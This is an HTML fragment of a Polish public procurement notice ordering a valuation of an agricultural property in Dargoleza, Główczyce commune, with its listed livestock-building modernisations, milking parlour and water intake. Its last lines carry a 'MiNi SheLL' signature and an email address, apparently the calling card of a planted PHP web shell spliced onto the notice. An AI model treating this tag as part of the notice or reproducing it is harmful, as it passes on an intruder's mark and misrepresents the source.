<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Obejmujące wykonanie usługi wyceny nieruchomości rolnej zabudowanej oznaczonej jako działka nr 27/4 o powierzchni 8,9500 ha położonej w gminie Główczyce, obręb Dargoleza, wraz z poniesionymi nakładami w postaci następujących inwestycji :
a) Rozbudowa budynku biurowo-mieszkalnego wraz z przyłączami kanalizacyjnymi i zbiornikiem bezodpływowym nr II-1-3 - polegająca na wykonaniu robót modernizacyjnych w celu przystosowania budynku do celów biurowo - mieszkalnych, budowy przyłącza kanalizacyjnego oraz instalacji elektrycznej i wodnej,
b) Modernizacja budynku cielętnika nr II-1-32A - polegająca na zbudowaniu żłobów ciągłych ze stołem paszowym,
c) Modernizacja budynku cielętnika nr inw II-1-33D - polegająca na zbudowaniu żłobów ciągłych ze stołem paszowym,
d) Modernizacja budynku opasów  nr inw II-1-35B - modernizacja w celu przystosowania go do hodowli bydła mlecznego tj. wylania i profilowania posadzki betonowej na korytarzu paszowym, zbudowania nowych boksów i kojców, ułożenie instalacji elektrycznej i wodnej,
e) Modernizacja budynku opasów  nr inw II-1-36  - modernizacja przeprowadzona w celu przystosowania go do hodowli bydła mlecznego w systemie wolno stanowiskowym tj. wylania dodatkowej płyty betonowej pod legowiska, zamontowanie boksów, poszerzenie korytarza paszowego, ułożenie instalacji elektrycznej i wodnej,
f) Modernizacja budynku opasów  nr inw II-1-37 - - modernizacja przeprowadzona w celu przystosowania go do hodowli bydła mlecznego w systemie wolno stanowiskowym tj. wylania dodatkowej płyty betonowej pod legowiska, zamontowanie boksów, poszerzenie korytarza paszowego, ułożenie instalacji elektrycznej i wodnej,
g) Modernizacja budynku opasów  nr inw II-1-38 - modernizacja przeprowadzona w celu przystosowania go do hodowli bydła mlecznego w systemie wolno stanowiskowym tj. wylania dodatkowej płyty betonowej pod legowiska, zamontowanie boksów, poszerzenie korytarza paszowego, ułożenie instalacji elektrycznej i wodnej,
h) Modernizacja budynku gospodarczego warsztatu (budynek padłych zwierząt ) nr inw II-1-39- modernizacja przeprowadzona w celu przystosowania części otwartej do zamontowania hali udojowej, wylanie posadzki betonowej, ułożenie instalacji elektrycznej i wodnej oraz wykonania kablowego zasilania elektrycznego
i) Modernizacja dróg i placów nr inw II-2-23 - polegająca na wykonaniu betonowych ciągów komunikacyjnych łączących obory z halą udojową wraz z korytem dezynfekcyjnym i bramkami
j) Budowa hali udojni części socjalnej
k) Budowa własnego ujęcia wody podziemnej wraz z przyłączem niezbędnym do jego eksploatacji, 
l) Budowa hali udojni części technologicznej
W operacie szacunkowym należy podać wartość nieruchomości wraz z nakładami oraz wartość poszczególnych nakładów. 
Kopia mapy ewidencyjnej i mapa sytuacyjno - wysokościowa - stanowią załącznik nr 12 i 13 do SIWZ..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 71.31.90.00-7.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w dniach: 30.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 95</li>
<li>2. Termin wykonania - 5</li>
</ul>
</li>
</ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com